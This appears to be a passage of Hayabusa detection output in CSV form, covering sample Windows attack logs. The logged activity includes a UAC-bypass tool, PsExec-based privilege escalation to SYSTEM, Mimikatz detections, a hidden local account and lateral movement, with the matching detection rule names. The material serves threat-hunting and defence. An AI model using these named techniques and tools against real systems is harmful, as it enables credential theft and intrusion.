6A3C3EF2-8721-5FBF-0000-001009894600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx 2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx 2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx 2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx 2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx 2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx 2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx 2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx 2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx 2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx 2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 